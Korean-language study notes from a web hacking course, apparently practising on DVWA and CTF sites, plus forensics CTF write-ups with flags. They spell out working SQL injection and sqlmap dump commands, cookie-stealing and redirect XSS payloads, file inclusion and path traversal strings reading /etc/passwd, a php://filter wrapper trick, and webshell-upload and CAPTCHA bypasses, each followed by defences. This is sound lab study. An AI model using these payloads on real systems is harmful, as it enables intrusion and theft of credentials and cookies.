2)최종 실습(SQL injection으로 shell 얻어내기)

• 웹페이지 살펴보며(메뉴 클릭) 정보 얻어내기
• 각 메뉴 클릭해보며 id=~(아이디 파라미터 변경되는 것 예의주시)
• sql injection공격 가능 파악/ id='--> sql error발생--> sql injection 에 취약할 가능성 높음--> terminal에 sql map -u옵션을 준후 정상적 주소 "복붙"

--> di parameter가 취약, XSS취약 가능성에 대한 정보가 출력됨. +) 192.168~id=--> scriprt실행됨--> reflected XSS취약점 발견 --> 최종 정보: id parameter취약 --> --current-db --> 'photoblog'로 현재 db명이 출력됨 --> -D photoblog --dump -->db내용이 전부 출력됨 user table, admin(id), pw출력

--> 찾은 id/pw으로 로그인--> 공격성공

*자바스크립트 -웹 애플리케이션에서 사용하는 언어 html:텍스트나 이미지 등 정적인 내용을 표시 자바스트립트: 동적인 기능 구현(마우스를 가져가면 색깔이 변화하는 것이 예시이다.) -로 구현 예시) --> 쿠키를 빼낼 떄 사용가능

-->소스 외부 자바스크립트를 페이지 내에 심을 수 있음

*XSS공격 클라이언트쪽의 웹브라우저를 공격하는 기법

What's your name?-->: 쿠키값 출력됨. 출력된 쿠키값은 외부 사이트로 전송하기 위해 terminal에서 tail -f/opt/lampp/logs/access log입력하여 웹 서버 로그 출력하기

What's your name?-->--> 해커 사이트로 xss에 공격당한 사람의 쿠키값이 전송됨.

위 내용을 활용하여 피싱 메일을 보내어 더 그럴듯하게 공격할 수 있다.

*Reflected XSS공격

*Stored XSS공격

<Stored XSS공격> 방명록 작성 페이지

name--> 테스트/ message--> ((inspect element-->max length:50-->500 to whatever 최대입력가능 수 수정가능)) -> script실행됨.

웹 서버 로그 살펴보면 쿠키가 해커호스트로 전달됨.

<BeEF프레임워크> kail terminer--> BeEF실행->username,pw:beef *BeEF-> 웹브라우저 취약점 공격에 유용한 도구가 됨. hook.js를 취약점에 적용하면 클라이언트 쿠키 탈취 가능

<미디엄 단계> *reflected

what's your name?--> -> Hello alert(1)출력 소스코드 확인: str_replace

<하이단계> *reflected

what's your name?--> ->Hello>출력 소스코드확인: 대소문자확인, 문자사이 공격도 방지--> script태그 이용한 공격 불가능 but, html태그 이용하여 우회가능 what's your name?--><img src=x onerror=window.location.assign("http://127.0.0.1/hacked.php")>:해커사이트로 리다이렉트 시킴--> 공격성공

<svg onload=window.location.assign("http://127.0.0.1/hacked.php")>로도 공격가능

**<XSS공격 대응> ** what's your name?--> -> Hello 출력

소스코드-> htmlspcialchars함수 사용-> 페이지 상에는 특수문자가 그대로 표시되지만 실제로는 변환되어 적용되지 않음.

입력되어야 하는 형식을 꼼꼼히 확인하도록 하면 XSS공격에 대응할 수 있다.

HxD를 이용해봤자 이미 mail.txt는 flag와 같은 텍스트로 구성되어 있으니 도움이 되지 않을 것이고 그럼 어떻게 mail텍스트로부터 다른 문자열을 얻어낼지 고민하다 "디지털포렌식 스팸"으로 구글링해보니 스팸메일을 복호화해 볼 수 있음을 알게 되었다. 알려준 사이트로 복호화 해보니 --> flag=EVI$ION{HOT_SP4M}

<과제2_2> 파일을 열어보면 위와 같은 사진이 나온다. 냅다 파일을 HxD에 넣어봤다. 한번 꼼꼼히 파일시그니처부터 살펴보자. (jpg의 파일 시그니처= FF D8 FF E1 xx xx 45 78) 검색보니 코드의 맨 첫번째 줄이 외에 파일시그니처값을 가지는 부분이 또 존재한다는 것을 알게 됨. 그 부분부터 시작하도록 하는 파일을 만들어보았으나 처음에 봤던 사진과 동일.... 이번에는 헤더 시그니처가 아닌 푸터시그니처를 확인해보자. (jpg의 푸터시그니처= FF D9) 검색해보니 총 3부분에 위와 같은 시그니처가 존재했다. 푸터가 끝난 후 시작되는 00 00 00 ~ 이부분은 어떠한 형식파일의 헤더시그니처인지 검색해보니 3GG파일! 다시 이 부분부터 시작되는 파일을 만들어보자. (3GG의 확장자명은 .3gp혹은 .3GP) 만들어보니 다음과 같은 영상을 볼 수 있다.--> flag: EVI$ION{TH1S_1S_TH3_FLAG}

<과제2_3> 파일을 열고 힌트를 확인해보자. 여우와 여우의 친구를 좋아한다... 일단 여러개의 jpg파일이 있으니 개별파일보다는 zip파일 자체를 검사해보자. 파일을 HxD에 넣어서 헤더시그니처부터 살펴보자. (zip파일의 시그니쳐: 50 4B 03 04) 헤더시그니처가 총 7부분에서 발견된다. 그러나 zip파일에는 총 6개의 파일이 있었다. 그러면 마지막 헤더시그니처부분부터 시작되는 zip파일을 생성해보자. ---> flag: EVI$ION{BfoxF}

<CTF-d multimedia문제> 이 문제를 풀어보도록 하자. 스팸 파일을 열어보면 다음과 같은 텍스트를 볼 수 있다. ...기출문제다ㅎㅎ 바로 복호화를 해보러가자. --> flag: flag_is_b3st_spam_st3g4n0 정답!!

-2011년 소니 해킹-> 100만명의 개인정보 해킹 -2015년 뽐뿌 해킹-> 190만 회원 정보 유출 -2015년 어나니머스 WTO해킹

*where구문 공격 *

사용자정보 요청-> 앱 내부 DB로 sql쿼리문전송(where조건문 포함)-> 사용자가 작성한 것이 조건으로 입력 -> id가 1인경우 users라는 사용자 테이블에서 이름과 이메일을 가져옴 where조건문에 '1'='1' 추가 항상 참이되도록 하여 모든사용자의 개인정보 리턴.

UNION공격

or 대신 union(합집합), pw요구하는 select문 삽입 원래실행되어야 하는 아이디가 1인 사용자 정보 외에도 뒤에 있는select구문 실행 --> where조건문이 없어서 모든 사용자의 개인정보가 리턴.

<실습> *where 구문 우회 -user id=1 입력 시 아이디가 1인 사용자의 정보가 출력됨(admin) -user id= ' 입력해보기-> 취약한 페이지의 경우 sql관련 에러발생(소스코드확인-->where user id='''가 되면서 에러가 발생했음을 할 수 있음: 비정상적인 문자 입력 시 sql쿼리문이 잘못되어 에러발생-> 그 페이지는 sql쿼리문을 이용하여 처리된 다는 것을 파악할 수 있음) -user id='1'or'1'='1' 입력(조건문이 항상 참이 되도록 함)-> 모든 정보출력 -user id='#-> 에러 발생하지 않은 -> db에서 #이후 내용이 모두 주석처리되어 쿼리문구조에 영향 주지 않기 떄문

*union이용-> db모든 정보 알아낼 수 있음 원래쿼리문의 uion앞뒤 select문의 칼럼갯수가 동일해야 작동함.

• 원래 쿼리문의 칼럼갯수 알아내기union앞쪽 select문의 칼럼갯수)
• user id='1' union select 1#--> 칼럼 갯수 동일하지 않아 에러 발생
• user id='1' union select 1,1#--> 아이디 1의 정보와 아이디 1,1의 정보 가 합집합으로 같이 출력됨
• user id='1' union select 1,1,1#-->칼럼 갯수 동일하지 않아 에러 발생 ('1' order by 2#로도 칼럼갯수 알 수 있음)

*UNION공격

• db명 조회--> user ID: '1' union select schema name,1 form information schema,schemata # 모든 db명이 출력됨
• dvwa db의 테이블 명 조회--> user ID: '1' union select table_schma, table_name from information_schema.tables where table_schema='dvwa'# 테이블 조회 가능(--> guestbook // users)
• use 테이블 칼럼 조회-->'1' union select table name, column_name from information_schema.colums where table_schema='dvwa' and table_name='users'3 user ID, first,lastname, pw 등 의 테이블 칼럼 출력
• 그 중 pw를 가져와보자-- > user ID: '1' union select user, password form users# 사용자명, pw가 출력됨(pw가 hash값형태--> db가 털려도 암호화된 값으로 저장되있으면 해커가 쉽게 복원하지 못함.)

*블라인드sql인젝션 -user id: 1 ---> id가 존재함 -user id: 6--> id가 존재하지 않음 -user id:'--> id가 존재하지 않음(에러발생하지 않음--> 조작가능한 파트 알기 어려움.) -user id: '1' AND '1'='1'#--> id가 존재함(조건문이 참) -user id: '1' AND '1'='2'#--> id가 존재하지 않음(조건문이 거짓) AND같은 연산실행--> sql쿼리가 뒤에 있음을 확인-> admin존재하는지 and 뒤에 다른 조건 --> 존재확인가능 ++) -블라인드 sql인젝션 참 구문-->'1' AND 1=1# -블라인드 sql인젝션 거짓 구문-->'1' AND 1=2# F11-> network-> 시간기반 블라인드 sql인젝션 탐지 구문-->'1' AND SLEEP(5)#--> 시간 확인

*SQLMAP프로그램(자동공격) dvwa-> sqlmap클릭-> -u URL:공격할 사이트 입력

• sqlmap -u"정상처리된 페이지 url 복붙" --F11 console 창에 documnet.cookie입력해서 얻은 쿠키값--> --cookie="~" 자동공격 실행--> 최종적 id parameter가 취약하다는 결과가 나옴 (가능한 공격, 개발언어 등 제시)
• 현재 db의 이름 --current db: dvwa
• table명: -D dvwa --table: guestbook,, users
• users data추출: -T users --dump: users table의 모든 정보 출력

*medium,high -소스코드: mysql_querry를 통해 바로 쿼리가 호출됨

*SQL인젝션 공격 대응 -source code: 입력받을 값의 형태에 따라 입력값 검증(숫자, 문자, 특수문자 등)/ 파라미터 쿼리(prepare:쿼리문 형태 작성), 쿼리문 조작 하지 못하도록 처리

*파일 인클루젼 공격: 지정한 파일 PHP include()로 소스코드에 삽입(PHP에서는 include 함수를 통해 파일을 소스코드에 삽입가능하기 때문)

• 로컬파일인클루젼(LFI): 이미 시스템에 존재하는 파일을 인클루드
• 리모트 팡리 인클루젼(RFI): 외부에 있는 파일을 원격으로 인클루드(더 강력한 공격)
• 파일 인클루젼 공격 실습
• low terminal-> gedit/opt/lampp/htdocs/bad.php-> text editer열기 print "RFI Success!";저장 브라우저에서 새탭에 127.0.0.1/bad.php 열리는지 확인 각file 열어보며 정보 확인 RFI공격-> 페이지 parameter에 http://127.0.0.1/bad.php입력--> rfi성공(웹서버에 올려둔 파일을 dvwa에서 실행할 수 있게 됨.) system('cat /etc/passwd'); 추가 저장한 후 dvwa로 다시 열어보자.--> etc pw정보 출력받을 수 있음

*LFI(시스템 내 이미 존재하는 파일만 접근가능하지만 etcpw와 같은 중요한 정보 출력가능) 페이지 parameter에 page=/etc/passwd로 수정해보다--> lfi 공격 success

• in linux-->../(상위 경로 접근가능) page=../../../../../../~(6번 이상 입력 시 최상위 경로 접근 가능--> 허가되지 않은 파일에 접근할 수 있겠다.)<path traversal 공격>

-medium RFI공격-> 페이지 parameter에 http://127.0.0.1/bad.php입력--> 실행되지 않음.() view source-->입력값 검증을 실시하는 루틴이 생성되어 있음(http://,https://-> 원격사이트로 접근하는 경우 차단)(../-> path traversal공격 차단) 문제가 있는 부분을 한번 지우고 있다!---> http:// page=h(http://)ttp://127.0.0.1/bad.php--> http://가 입력값검증에 의해 지워졌으나 남은 문자열이 http://이기에 우회한 것

-high page=hhttp://ttp://127.0.0.1/bad.php--> 실행되지 않음(rfl공격 실패) page=/etc/passwd--> 실행되지 않음(lfi공격 실패) view source(어떻게 대응하고 있는지 살펴보자)-->입력값 검증 부분--> file*검사, 페이지 파라미터의 값이 file로 시작하지 않거나 include.php가 아닐 경우 에러발생시킴 page=file/../../../../../../../../../etc/passwd--> lfi 공격 success rfi공격의 경우 file문자열로 시작해야하나 http://를 작성할 수 없기에 공격 불가능

*파일 인클루젼 공격대응: 꼭 필요한 파일만 인클루드되도록 검사하는 소스코드

문제풀어보기(dreamhack) index.php--> main.php를 include를 통해 page변수에 php이름을 입력받음(ex> page=view--->view.php로 이동) view.php--> flag필터링 -url-->http://host3.dreamhack.games:14116/?*page=view&file=../uploads/flag.php** -flag.php-->Permission denied

-->flag를 얻기위해 flag필터링을 우회해야함. *flag 필터링 우회기법 중 php wrapper page에 wrapper를 사용-> flag.php읽는 방식-> flag 필터링 과정skip 가능

http://host3.dreamhack.games:14116/?page=php://filter/convert.base64-encode/resource=/var/www/uploads/flag PD9waHAKCSRmbGFnID0gJ0RIe2JiOWRiMWYzMDNjYWNmMGYzYzkxZTBhYmNhMTIyMWZmfSc7Cj8+CmNhbiB5b3Ugc2VlICRmbGFnPw==

<파일 업로드 공격>

*파일 업로드 공격: 파일이 업로드 되는 페이지(게시판, sns)에 악성 파일(웹쉘-웹을 통해 시스템 명령어 실행 가능)을 업로드

• 파일 업로드 공격 실습
• low 이미지 파일을 업로드하라는 페이지 --> 이미지 파일 대신 웹셀 파일을 업로드해보자. 우선 웹셀파일을 준비해야한다.

(githup에서 webshell.php->raw->url copy해서 terminal에서 root/ wget으로 다운로드해놓기)

dvwa에서 webshell.php를 업로드

-->상위 directory나옴 페이지 파라미트 변경해보자--> enter a command 창이 뜨고 그곳에 cat /etc/passwd입력-->정보 출력(시스템 명령어를 실행할 수 있는 웹셸)

-medium root의 webshell.php업로드 실패-->jpg,png만 accept가능 -->버프스위트로 파일이 업로드 될 떄 요청을 intercept해보자.

--> content type: (application/x-php--> image/jpeg로 변경해보자--> 업로드 성공)--> content type조사만으로는 방어하기에 불충분함!

-high veiw source-> 어떻게 대응하고 있는지 살펴보자 content type을 검사하는 것이 아니라 파일 name이 jpg, jpng, png인지 확인하고 있다. 또한 getimagesize실제로 파일 내용이 이미지인지도 검사하고있다.

대응이 강화되었으나 이 루틴도 우회 가능하다. 아까처럼 intercept실시!--> 이번에는 filename 부분 수정(phh-->php.jpg)& 파일 내용에 GIF89a(GIF이미지 파일의 표준정의값)추가(이미지 파일인 척 가능)--> 업로드 성공

*파일 업로드 공격 대응: -이미지 파일인지 검사한 후 업로드 된 내용으로 이미지 다시 생성하여 무늬만 이미지인 파일이 실행되는 것을 원천봉쇄한다. -업로드되는 파일의 이름을 랜덤하게 생성시켜 해커가 자신이 업로드한 파일에 접근하지 못하게 하는 방법 -업로드되는 서버를 웹어플리케이션 서버와 분리함 -업로드폴더의 실행권한을 완전히 제거하여 파일 인클루젼 공격으로부터도 대응하여 업로드된 파일이 웹어플리케이션에서 실행되는 것을 차단.

*문제풀어보기(portswigger)

???

<CAPTCHA 공격>

*CAPTCHA공격: 컴퓨터는 알수없는 흘려쓴 글, 그림을 제대로 인식하면 사람이라고 확인하는 것으로 회원가입 혹은 비밀번호 등과 같이 사용자(사람)가 직접해야만 하는 경우사용한다. 또한 브루트포스와 같은 프로그램을 이용한 공격에 대응할 때 효과적이다. 이를 제대로 구현하지 못한다면 해커가 이를 우회하여 공격할 수 있다.

• CAPTCHA 공격 실습
• low proxy history를 통해 작동메커니즘 살펴보자--> 번호 순정렬을 통해 최근 명령확인

change 버튼 누를 때마다 step++(첫번째 요청 step1 ,두번째 요청 step2) 두요청 모두 pw가 포함되어서 전송됨 두번째 요청에서 send to repeater-> repeater탭에서 pw부분을 normal 대신 hacker로 바꿔보자

로그아웃 후 admin/normal입력 시 실패, admin/hacker입력 시 로그인 성공(pw변경됨) captcha 값을 제대로 입력하지 않아도 두번째 요청만 보내 pw를 변경할 수 있음.

-medium proxy history를 통해 작동메커니즘 살펴보자(new_pw,confirm_pw, captcha 옳바르게 입력 후 chage 버튼 누르기) -> pw changed 창 뜬다. 이번에도 두단계에 걸쳐서 pw 변경하고 있다. 두번째 요청내용을 살펴보면 step->2, pw도 같이 포함되어 있음 한가지 추가된 점: passed_captcha--> captcha가 제대로 입력되었는지 확인하려고 한 듯 하다. 파라미터를 하나 더 추가하긴 했으나 로우 단계와 다를 것없는 방식으로 쉽게 공격가능..

-high proxy history를 통해 작동메커니즘 살펴보자(new_pw,confirm_pw, captcha 옳바르게 입력 후 chage 버튼 누르기) -> pw changed 창 뜬다. repeater 에서 pw_new와 pw_confirm parameter를 normal2로 변경해보자/ grecaptcharesponse--> hidden value 로 변경, useragent--> recaptcha로 변경-> pw 변경됨 captcha 값을 제대로 입력하지 않아도 pw변경가능. ---> captcha요청을 한단계로 만든것은 좋은 대응방안이었으나 특정한 값을 if문으로 검사하여 우회할 수 있는 코드를 넣을 것인 문제가 되었다.(조건문을 넣은 경우-> 개발자가 디버깅이나 테스트를 할때 좀더 간편하게 하려고 했으나 제거하지 않은 경우 실제로 이런 테스트 코드가 release시 포함될 수 있으니 주의해야한다.)

*CAPTCHA공격대응: 코드가 실제로 웹사이트를 통해 서비스될 때 디버깅 코드가 없는지 확인해주어야 한다. 현재 pw를 한번 더 입력하도록 하여 pw변경의 경우 보안을 강화한다.(csrf공격 대응과 유사) captcha를 확인하는 루틴이 한번에 처리되록 하는 것이 좋다-> 요청 여러개로 나누어 처리할 경우 반드시 모든 단계를 정상적으로 통과하도록 구현해야 한다.

<과제1-2> 확장자명이 없는 data파일이 있다. HxD로 파일의 시그니처를 확인해보자--> PSD파일임을 알았다. 파일에 확장자명(.PSD)를 추가해준 후 psd를 열 수 있는 사이트에서 열어보자. then, 파일이 열린다 -->EVI$ION{Duckiese_Summon_Doorie!}

<과제1-3> 이번 문제는 어떻게 풀어야할 지 바로 감이 안오므로 hint를 잘 살펴보았다. hint대로 우선 HxD로 두 jpg파일을 살펴봐야겠다. 두 파일의 차이를 분석하기 위해 HxD의 비교기능을 활용해보자.

그래서 두 파일의 차이가 무슨 의미가 있지? 라는 생각이 들던 찰나 hint에 있던 사막에서 바늘찾기가 떠오르면서 뭔지는 모르겠지만 중요하다는 것을 직감하고 포스트잇에 비교된 부분들을 차례대로 작성해보니 -->"EVI$ION{FLAGCATCHER}"가 나온다.

<과제2-multimedia> 첫번째 문제 도전! 문제의 jpg파일을 열어보니 다음과 같았다. 처음에는 어떻게 풀지 몰라 HxD에 넣어 flag 혹은 key값을 찾아보기도 했으나 아무런 정보도 얻을 수 없었다. 다운받은 jpg파일을 이리저리 만져보던 중 밝기를 낮추니 어떤 형태가 나타나기 시작했고 잘 보니 강아지 형태와 희미한 글씨가 보이는 것을 확인했다...문제에서 강아지 얘기가 나온이유가 있었군..이라는 생각과 함께 확대 및 파일 수정을 해가며 정답을 찾고 작성! --> 해결완료!!! 디지털 포렌식 꽤..재밌을지도..